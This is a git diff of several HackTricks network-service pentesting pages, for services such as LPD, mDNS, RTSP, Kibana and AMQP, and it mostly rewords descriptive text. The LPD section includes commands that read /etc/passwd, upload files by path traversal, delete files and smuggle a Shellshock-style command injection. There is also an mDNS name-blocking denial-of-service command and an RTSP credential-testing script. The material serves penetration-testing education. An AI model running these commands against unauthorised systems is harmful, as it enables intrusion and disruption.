b/network-services-pentesting/3690-pentesting-subversion-svn-server.md @@ -17,8 +17,7 @@ Other ways to support HackTricks: # Basic Information -Subversion is one of many version control options available today. It's often abbreviated as SVN.\ -Subversion is used for maintaining current and historical versions of projects. Subversion is an open source centralized version control system. It's licensed under Apache. It's also referred to as a software version and revisioning control system. +**Subversion** is a centralized **version control system** that plays a crucial role in managing both the present and historical data of projects. Being an **open source** tool, it operates under the **Apache license**. This system is widely acknowledged for its capabilities in **software versioning and revision control**, ensuring that users can keep track of changes over time efficiently. **Default port:** 3690 diff --git a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md index 2ba5c5bf9..72254df3e 100644 --- a/network-services-pentesting/3702-udp-pentesting-ws-discovery.md +++ b/network-services-pentesting/3702-udp-pentesting-ws-discovery.md @@ -17,16 +17,12 @@ Other ways to support HackTricks: # Basic Information -The Web Services Dynamic Discovery Protocol (WS-Discovery) is a multicast discovery protocol that locates services on a local network. +The **Web Services Dynamic Discovery Protocol (WS-Discovery)** is identified as a protocol designed for the discovery of services within a local network through multicast. It facilitates the interaction between **Target Services** and **Clients**. Target Services are endpoints available for discovery, while Clients are the ones actively searching for these services. Communication is established using **SOAP queries over UDP**, directed to the multicast address **239.255.255.250** and UDP port **3702**. -In WS-Discovery terminology, a Target Service is an endpoint that makes itself available for discovery, whereas a Client is an endpoint that searches for Target Services. Both use SOAP queries over UDP to the 239.255.255.250 multicast address with the destination UDP port 3702. +Upon joining a network, a Target Service announces its presence by broadcasting a **multicast Hello**. It remains open to receiving **multicast Probes** from Clients that are on the lookout for services by Type, an identifier unique to the endpoint (e.g., **NetworkVideoTransmitter** for an IP camera). In response to a matching Probe, a Target Service may send a **unicast Probe Match**. Similarly, a Target Service could receive a **multicast Resolve** aimed at identifying a service by name, to which it may reply with a **unicast Resolve Match** if it is the intended target. In the event of leaving the network, a Target Service attempts to broadcast a **multicast Bye**, signaling its departure. ![](<../.gitbook/assets/image (633).png>) -A Target Service sends a multicast Hello 1 when it joins a network. The Target Service can receive a multicast Probe 2, a message sent by a Client searching for a Target Service by Type, at any time. The Type is an identifier for the endpoint. For example, an IP camera could have NetworkVideoTransmitter as a Type. It might also send a unicast Probe Match3 if the Target Service matches a Probe (other matching Target Services might also send unicast Probe Matches). Similarly, a Target Service might receive a multicast Resolve4 at any time, a message sent by a - -Client searching for a Target by name, and send a unicast Resolve Match5 if it’s the target of a Resolve. Finally, when a Target Service leaves a network, it makes an effort to send a multicast Bye 6. - **Default port**: 3702 ``` diff --git a/network-services-pentesting/4786-cisco-smart-install.md b/network-services-pentesting/4786-cisco-smart-install.md index 6672c4f22..9d33165e7 100644 --- a/network-services-pentesting/4786-cisco-smart-install.md +++ b/network-services-pentesting/4786-cisco-smart-install.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
@@ -47,9 +47,6 @@ The address of the target switch is **10.10.100.10 and CSI is active.** Load SIE The switch configuration **10.10.100.10** will be in the **tftp/** folder -\ - -
@@ -59,7 +56,7 @@ The switch configuration **10.10.100.10** will be in the **tftp/** folder * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/4840-pentesting-opc-ua.md b/network-services-pentesting/4840-pentesting-opc-ua.md index de4cfb7eb..9bbaa264f 100644 --- a/network-services-pentesting/4840-pentesting-opc-ua.md +++ b/network-services-pentesting/4840-pentesting-opc-ua.md @@ -16,11 +16,9 @@ Other ways to support HackTricks: ## Basic Information -OPC UA stands for Open Platform Communications Unified Access. It is a long-standing open-source protocol for data exchange, telemetry collection, and control of industrial equipment. It is very widely used in industrial settings including Manufacturing, Energy, Aerospace, and Defence. It is the only standardized way of communicating with PLCs and allows the equipment of different vendors to communicate with each other. +**OPC UA**, standing for **Open Platform Communications Unified Access**, is a crucial open-source protocol used in various industries like Manufacturing, Energy, Aerospace, and Defence for data exchange and equipment control. It uniquely enables different vendors' equipment to communicate, especially with PLCs. -OPC UA is very flexible in terms of configuration. It can be configured to be extremely secure, or insecure. Many times the security features are disabled to allow communication with older devices. Testing the configuration for weaknesses can therefore reveal easy entry to critical systems. - -Network scanners do not recognize OPC UA, thus discovery may require some work if nonstandard ports are used. +Its configuration allows for strong security measures, but often, for compatibility with older devices, these are lessened, exposing systems to risks. Additionally, finding OPC UA services can be tricky since network scanners might not detect them if they're on nonstandard ports. **Default port:** 4840 @@ -39,8 +37,6 @@ opalopc -vv opc.tcp://$target_ip_or_hostname:$target_port ### Exploiting vulnerabilities -**⚠️ Warning ⚠️**: Poking around without knowing what you are doing may cause serious health hazards to people and monetary losses to your client - If authentication bypass vulnerabilities are found, you can configure an [OPC UA client](https://www.prosysopc.com/products/opc-ua-browser/) accordingly and see what you can access. This may allow anything from merely reading process values to actually operating heavy-duty industrial equipment. To get a clue of the device you have access to, read the "ServerStatus" node values in the address space and google for a usage manual. @@ -51,7 +47,7 @@ To get a clue of the device you have access to, read the "ServerStatus" node val ## References -* https://opalopc.com/how-to-hack-opc-ua/ +* [https://opalopc.com/how-to-hack-opc-ua/](https://opalopc.com/how-to-hack-opc-ua/)
diff --git a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 058d30dc9..8af234041 100644 --- a/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -14,22 +14,30 @@ Other ways to support HackTricks:
+### **Introduction to LPD Protocol** -The Line Printer Daemon (LPD) protocol had originally been introduced in Berkeley Unix in the 80s (later specified by RFC1179).\ -The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**. +In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**. -The `lpdprint` and `lpdtest` tools are included in [**PRET**](https://github.com/RUB-NDS/PRET)**.** They are a minimalist way to print data directly to an LPD capable printer or download/upload/delete files and more: +### **Tools for Interacting with LPD Printers** -``` +[**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting: + +```python +# To print a file to an LPD printer lpdprint.py hostname filename +# To get a file from the printer lpdtest.py hostname get /etc/passwd +# To upload a file to the printer lpdtest.py hostname put ../../etc/passwd +# To remove a file from the printer lpdtest.py hostname rm /some/file/on/printer +# To execute a command injection on the printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' +# To send a mail through the printer lpdtest.py hostname mail lpdtest@mailhost.local ``` -If you want to learn more about [**hacking printers read this page**](pentesting-printers/). +For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page). # Shodan diff --git a/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/network-services-pentesting/5353-udp-multicast-dns-mdns.md index 325784533..2cf758f36 100644 --- a/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -14,83 +14,58 @@ Other ways to support HackTricks:
-## Basic Information +## **Basic Information** -Multicast DNS (mDNS) is a **zero-configuration protocol** that lets you perform **DNS-like operations** on the local network in the absence of a conventional, unicast DNS server. The protocol uses the **same** API, **packet formats**, and operating semantics as DNS, allowing you to resolve domain names on the local network. **DNS Service Discovery (DNS-SD)** is a protocol that allows clients to **discover a list of named instances of services** (such as test.\_ipps.\_tcp.local, or linux.\_ssh.\_tcp.local) in a domain using standard DNS queries. DNS-SD is most often used in conjunction with mDNS but isn’t dependent on it. They’re both used by many IoT devices, such as network printers, Apple TVs, Google Chromecast, Network-Attached Storage (NAS) devices, and cameras.\ -**Default port:** 5353/UDP +**Multicast DNS (mDNS)** enables **DNS-like operations** within local networks without needing a traditional DNS server. It operates on **UDP port 5353** and allows devices to discover each other and their services, commonly seen in various IoT devices. **DNS Service Discovery (DNS-SD)**, often used alongside mDNS, aids in identifying services available on the network through standard DNS queries. ``` PORT STATE SERVICE 5353/udp open zeroconf ``` -### How mDNS Works +### **Operation of mDNS** -Devices use mDNS when the local network **lacks** a conventional **unicast DNS server**. To resolve a domain name for a local address using mDNS, the device sends a **DNS query for a domain name** ending with **.local** to the **multicast** **address** 224.0.0.251 (for IPv4) or FF02::FB (for IPv6). You can also use mDNS to resolve **global domain names** (non .local ones), but mDNS implementations are supposed to **disable** this behavior by default. mDNS requests and responses use **UDP** and **port 5353** as both the source and destination port. +In environments without a standard DNS server, mDNS allows devices to resolve domain names ending in **.local** by querying the multicast address **224.0.0.251** (IPv4) or **FF02::FB** (IPv6). Important aspects of mDNS include a **Time-to-Live (TTL)** value indicating record validity and a **QU bit** distinguishing between unicast and multicast queries. Security-wise, it's crucial for mDNS implementations to verify that the packet's source address aligns with the local subnet. -The mDNS replies contain several important flags, including a **Time-to- Live** (TTL) value that signifies how many seconds the record is valid. Sending a reply with **TTL=0 means that the corresponding record should be cleared**. Another important flag is the QU bit, which denotes whether or not the query is a unicast query. If the **QU bit isn’t set**, the packet is a **multicast** query (QM). Because it’s possible to **receive unicast queries outside of the local link**, secure mDNS implementations should always **check that the source address in the packet matches the local subnet address range**. +### **Functioning of DNS-SD** -### How DNS-SD Works +DNS-SD facilitates the discovery of network services by querying for pointer records (PTR) that map service types to their instances. Services are identified using a **_\.\_tcp or \_\.\_udp** pattern within the **.local** domain, leading to the discovery of corresponding **SRV** and **TXT records** which provide detailed service information. -DNS-SD allows clients to **discover available services on the network**. To use it, clients send standard DNS queries for pointer records (PTR), which map the type of service to a list of names of specific instances of that type of service. +### **Network Exploration** -To request a PTR record, clients use the name form "\.\". The **\** part the **service name** preceded by "\_" (for example, \_ipps, \_printer, or \_ipp) and either **\_tcp or \_udp**. The **\** portion is "**.local**".\ -**Responders** then return the PTR records that point to the accompanying **service (SRV)** and **text (TXT) records**. Here is an example of a PTR record: +#### **nmap Usage** -``` - _ipps._tcp.local: type PTR, class IN, test._ipps._tcp.local -``` - -The part of the PTR record to the **left** of the colon is its **name**, and the part on the **right** is the **SRV** **record** to which the PTR record points. The **SRV** record lists the target **host** and **port** where the **service** instance can be reached. For example, the next image shows a "test.\_ipps.\_tcp.local" SRV record in Wireshark in host ubuntu.local and port 8000: - -![](<../.gitbook/assets/image (651) (1) (1) (1) (1).png>) - -Therefore, the **name of the SRV** record is **like** the **PTR** record **preceded** by the **\** name (test in this case). The **TXT** has the **same** **name** as the **SRV** record and contains the information needed when the IP address and port number (contained in the SRV record) for a service aren’t sufficient to identify it. - -## Enumeration - -### nmap +A useful command for scanning the local network for mDNS services is: ```bash -nmap -Pn -sUC -p5353 192.168.1.2 - -Starting Nmap 6.46 (http://nmap.org) at 2015-01-01 10:30 GMT -Nmap scan report for 192.168.1.2 -PORT STATE SERVICE -5353/udp open zeroconf -| dns-service-discovery: -| 9/tcp workstation -| Address=192.168.1.2 -| 22/tcp ssh -| Address=192.168.1.2 -| 22/tcp sftp-ssh -| Address=192.168.1.2 -| 445/tcp smb -| Address=192.168.1.2 +nmap -Pn -sUC -p5353 [target IP address] ``` -### Network Enumeration +This command helps identify open mDNS ports and the services advertised over them. -You can learn a lot about the local network by simply sending mDNS requests and capturing multicast mDNS traffic. +#### **Network Enumeration with Pholus** -You can use the tool [**Pholus**](https://github.com/aatlasis/Pholus/) to send a mDNS requests (-rq) on the local network and capture multicast mDNS traffic (for -stimeout 10 seconds): +To actively send mDNS requests and capture traffic, the **Pholus** tool can be utilized as follows: ```bash -sudo python3 pholus3.py eth0 -rq -stimeout 10 +sudo python3 pholus3.py [network interface] -rq -stimeout 10 ``` ## Attacks -### Abusing the mDNS Probing Phase +### **Exploiting mDNS Probing** -When a mDNS responder starts or changes its connectivity, it asks the local network if there is **any resource with the name he plans to use**. If the answer contains the record in question, the probing host **should choose a new name**. If 15 conflicts take place within 10 seconds, the host must then wait at least five seconds before any additional attempt. Additionally, if one minute passes during which the host can’t find an unused name, it reports an error to the user. - -The following command line will prevent any new device to get any new name as it will indicate that **any name is already taken**: +An attack vector involves sending spoofed responses to mDNS probes, suggesting that all potential names are already in use, thus hindering new devices from selecting a unique name. This can be executed using: ```bash -sudo python pholus.py eth0 -afre -stimeout 1000 +sudo python pholus.py [network interface] -afre -stimeout 1000 ``` +This technique effectively blocks new devices from registering their services on the network. + +**In summary**, understanding the workings of mDNS and DNS-SD is crucial for network management and security. Tools like **nmap** and **Pholus** offer valuable insights into local network services, while awareness of potential vulnerabilities helps in safeguarding against attacks. + + ### Spoofing/MitM The most interesting attack you can perform over this service is to perform a **MitM** in the **communication between the client and the real server**. You might be able to obtain sensitive files (MitM the communication with the printer) of even credentials (Windows authentication).\ diff --git a/network-services-pentesting/5439-pentesting-redshift.md b/network-services-pentesting/5439-pentesting-redshift.md index 0867ca553..6fc129284 100644 --- a/network-services-pentesting/5439-pentesting-redshift.md +++ b/network-services-pentesting/5439-pentesting-redshift.md @@ -7,7 +7,7 @@ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. @@ -27,7 +27,7 @@ For more information check: * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. diff --git a/network-services-pentesting/554-8554-pentesting-rtsp.md b/network-services-pentesting/554-8554-pentesting-rtsp.md index b003a3168..7d97680e0 100644 --- a/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/network-services-pentesting/554-8554-pentesting-rtsp.md @@ -16,12 +16,12 @@ Other ways to support HackTricks: ## Basic Information +From [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol): + > The **Real Time Streaming Protocol** (**RTSP**) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client (Video On Demand) or from a client to the server (Voice Recording). > > The transmission of streaming data itself is not a task of RTSP. Most RTSP servers use the Real-time Transport Protocol (RTP) in conjunction with Real-time Control Protocol (RTCP) for media stream delivery. However, some vendors implement proprietary transport protocols. The RTSP server software from RealNetworks, for example, also used RealNetworks' proprietary Real Data Transport (RDT). -From [wikipedia](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol). - **Default ports:** 554,8554 ``` @@ -29,33 +29,23 @@ PORT STATE SERVICE 554/tcp open rtsp ``` -## Detailed Information +## Key Details -First and foremost RTSP is an HTTP like protocol. It has different structure and control commands but is textual in its format and once you learn the basics of the commands and how they interact, fairly easy to use. The specification for RTSP is pretty straightforward. Here is a link to it: +**RTSP** is similar to HTTP but designed specifically for media streaming. It's defined in a straightforward specification which can be found here: [RTSP – RFC2326](https://tools.ietf.org/html/rfc2326) -RTSP can be accessed unauthenticated (common in off-the-shelf devices) or authenticated. Authenticated access mirrors HTTP in that you have Basic and Digest authentication, both nearly identical to HTTP. To find out whether your device is authenticated or unauthenticated, simply send a “DESCRIBE” request. A simple DESCRIBE request looks like: +Devices might allow **unauthenticated** or **authenticated** access. To check, a "DESCRIBE" request is sent. A basic example is shown below: `DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\n` -Note: the additional “\r\n” is required for reliable response. Some systems will accept the single “\r\n” but most won’t. +Remember, the correct formatting includes a double "\r\n" for a consistent response. A "200 OK" response indicates **unauthenticated access**, while "401 Unauthorized" signals the need for authentication, revealing if **Basic** or **Digest authentication** is required. -This can be sent down a raw socket. Just like HTTP, a successful response indicating unauthenticated access is available will contain a “200 OK”. In this case with DESCRIBE, it will also contain all of the operational parameters of the video feed. - -If the device requires authentication, the the response back will contain “401 Unauthorized”. The response will also indicate what authentication mechanisms are available. If Basic authentication is available the response string will contain an information line that has “WWW-Authenticate: Basic”. The rest of the information provide with Basic authentication is largely irrelevant to actually conduct basic authentication. - -If Digest authentication is required, then the “401 Unauthorized” response will have an information line containing “WWW-Authenticate: Digest”. The information with the Digest specification IS very important if you are going to do Digest authentication, so don’t ignore it. - -Basic authentication is the way to go, hopefully the response received indicates that it is available. If not there are three different methods to assemble a Digest authentication element, so Digest can become troublesome, especially blind (unauthenticated). The rest of this article will stick with Basic authentication. I may write a follow-up article later once I decipher the secret sauce to doing Digest authentication blind. - -To formulate a Basic authentication element, one simple has to base 64 encode \ “:” \ and add it to the request. So a new request would look like: +For **Basic authentication**, you encode the username and password in base64 and include it in the request like so: `DESCRIBE rtsp://: RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n` -Again note the request is terminated with the double “\r\n”. - -The value YWRtaW46MTIzNA== is the base 64 encoded username and password concatenated with “:”. In this case I have used “admin”/”1234”. Some simple python scripting to try this out looks like: +This example uses "admin" and "1234" for the credentials. Here's a **Python script** to send such a request: ```python import socket @@ -67,9 +57,10 @@ data = s.recv(1024) print(data) ``` -Voila! You have access. +**Basic authentication** is simpler and preferred. **Digest authentication** requires careful handling of the authentication details provided in the "401 Unauthorized" response. + +This overview simplifies the process of accessing RTSP streams, focusing on **Basic authentication** for its simplicity and practicality in initial attempts. -**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](https://web.archive.org/web/20161020202643/http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) ## Enumeration @@ -85,9 +76,7 @@ nmap -sV --script "rtsp-*" -p To bruteforce: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder) -**Cameradar** - -Cameradar allows you to: +[**Cameradar**](https://github.com/Ullaakut/cameradar) * Detect open RTSP hosts on any accessible target * Get their public info (hostname, port, camera model, etc.) @@ -96,6 +85,10 @@ Cameradar allows you to: * Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content * Try to create a Gstreamer pipeline to check if they are properly encoded * Print a summary of all the informations Cameradar could get + +## References +* [https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol) +* [http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/) * [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
diff --git a/network-services-pentesting/5555-android-debug-bridge.md b/network-services-pentesting/5555-android-debug-bridge.md index de8e38ec8..671bfd17b 100644 --- a/network-services-pentesting/5555-android-debug-bridge.md +++ b/network-services-pentesting/5555-android-debug-bridge.md @@ -16,7 +16,9 @@ Other ways to support HackTricks: ## Basic Information -**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. (from [here](https://developer.android.com/studio/command-line/adb)) +From [the docs](https://developer.android.com/studio/command-line/adb): + +**Android Debug Bridge** (adb) is a versatile command-line tool that lets you communicate with a device. The adb command facilitates a variety of device actions, such as i**nstalling and debugging apps**, and it provides **access to a Unix shell** that you can use to run a variety of commands on a device. **Default port**: 5555. diff --git a/network-services-pentesting/5601-pentesting-kibana.md b/network-services-pentesting/5601-pentesting-kibana.md index b6f7293af..e922ebc8e 100644 --- a/network-services-pentesting/5601-pentesting-kibana.md +++ b/network-services-pentesting/5601-pentesting-kibana.md @@ -17,25 +17,23 @@ Other ways to support HackTricks: # Basic Information -Kibana provides search and data visualization capabilities for data indexed in Elasticsearch. The service runs per default on port **5601**. Kibana also acts as the user interface for monitoring, managing, and securing an Elastic Stack cluster. +Kibana is known for its ability to search and visualize data within Elasticsearch, typically running on port **5601**. It serves as the interface for the Elastic Stack cluster's monitoring, management, and security functions. -## Authentication? +## Understanding Authentication -Authentication in Kibana is linked to the **credentials from** [**Elasticsearch**](9200-pentesting-elasticsearch.md). If **authentication** is **disabled** in **Elasticsearch**, **Kibana** also should be **accessible without credentials**. Otherwise the **same credentials valid for Elasticsearch** should be working when logging in to Kibana. The **rights** of the **users** in **Elasticsearch** are the **same** as in **Kibana**. +The process of authentication in Kibana is inherently linked to the **credentials used in Elasticsearch**. If Elasticsearch has authentication disabled, Kibana can be accessed without any credentials. Conversely, if Elasticsearch is secured with credentials, the same credentials are required to access Kibana, maintaining identical user permissions across both platforms. Credentials might be found in the **/etc/kibana/kibana.yml** file. If these credentials do not pertain to the **kibana_system** user, they may offer broader access rights, as the kibana_system user's access is restricted to monitoring APIs and the .kibana index. -You might find credentials in the configuration file **/etc/kibana/kibana.yml**. If those credentials are not for the user **kibana\_system**, it should be tried to use them for accessing further data. They could have more rights then the **kibana\_system** user, which only has access to the monitoring API and the **.kibana** index. +## Actions Upon Access -## Having Access? +Once access to Kibana is secured, several actions are advisable: -When having access to Kibana you can do several things: +- Exploring data from Elasticsearch should be a priority. +- The ability to manage users, including the editing, deletion, or creation of new users, roles, or API keys, is found under Stack Management -> Users/Roles/API Keys. +- It's important to check the installed version of Kibana for known vulnerabilities, such as the RCE vulnerability identified in versions prior to 6.6.0 ([More Info](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)). -* Try to **access data** from **Elasticsearch** -* Check if you can access the users panel and if you can e**dit, delete or create new users,** roles or API Keys (Stack Management -> Users/Roles/API Keys) -* Check the current version for vulnerabilities (**There was a RCE vulnerability in 2019 for Kibana versions < 6.6.0** \[[2](https://insinuator.net/2021/01/pentesting-the-elk-stack/#ref2)]) +## SSL/TLS Considerations -## Enabled SSL/TLS? - -If SSL/TLS is not enabled, it should be evaluated, whether sensitive information can be leaked. +In instances where SSL/TLS is not enabled, the potential for leaking sensitive information should be thoroughly evaluated.s ## References diff --git a/network-services-pentesting/5671-5672-pentesting-amqp.md b/network-services-pentesting/5671-5672-pentesting-amqp.md index b25b529d7..673ae6800 100644 --- a/network-services-pentesting/5671-5672-pentesting-amqp.md +++ b/network-services-pentesting/5671-5672-pentesting-amqp.md @@ -16,9 +16,11 @@ Other ways to support HackTricks: ## Basic Information -**RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\ -A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\ -Definition from [here](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html). +From [cloudamqp](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html): + +> **RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.\ +> A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application (which could even be on another server), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.\ +Definition from . **Default port**: 5672,5671 @@ -69,7 +71,7 @@ PORT STATE SERVICE VERSION ## Other RabbitMQ ports -From [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**: +In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**: * **1883, 8883**: ([MQTT clients](http://mqtt.org) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [**Learn more about how to pentest MQTT here**](1883-pentesting-mqtt-mosquitto.md). * **4369: epmd**, a peer discovery service used by RabbitMQ nodes and CLI tools. [**Learn more about how to pentest this service here**](4369-pentesting-erlang-port-mapper-daemon-epmd.md). diff --git a/network-services-pentesting/584-pentesting-afp.md b/network-services-pentesting/584-pentesting-afp.md index e1e6633fd..14f900e39 100644 --- a/network-services-pentesting/584-pentesting-afp.md +++ b/network-services-pentesting/584-pentesting-afp.md @@ -14,30 +14,33 @@ Other ways to support HackTricks:
+ ## Basic Information -The **Apple Filing Protocol** (**AFP**), formerly AppleTalk Filing Protocol, is a proprietary network protocol, and part of the **Apple File Service** (**AFS**), that offers file services for macOS and the classic Mac OS. In macOS, AFP is one of several file services supported\*\*.\*\* AFP currently supports Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and advanced file locking. In Mac OS 9 and earlier, AFP was the primary protocol for file services. +The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within the **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and sophisticated file locking mechanisms. It was the main protocol for file services in Mac OS 9 and earlier versions. -**Default port:** 548 +**Default Port:** 548 -``` +```bash PORT STATE SERVICE 548/tcp open afp ``` -## Enumeration +### **Enumeration** + +For the enumeration of AFP services, the following commands and scripts are useful: ```bash msf> use auxiliary/scanner/afp/afp_server_info nmap -sV --script "afp-* and not dos and not brute" -p ``` -| **Name** | **Description** | -| -------------- | ------------------------------------------------------------------------------------------------------------------------------------------ | -| afp-ls | 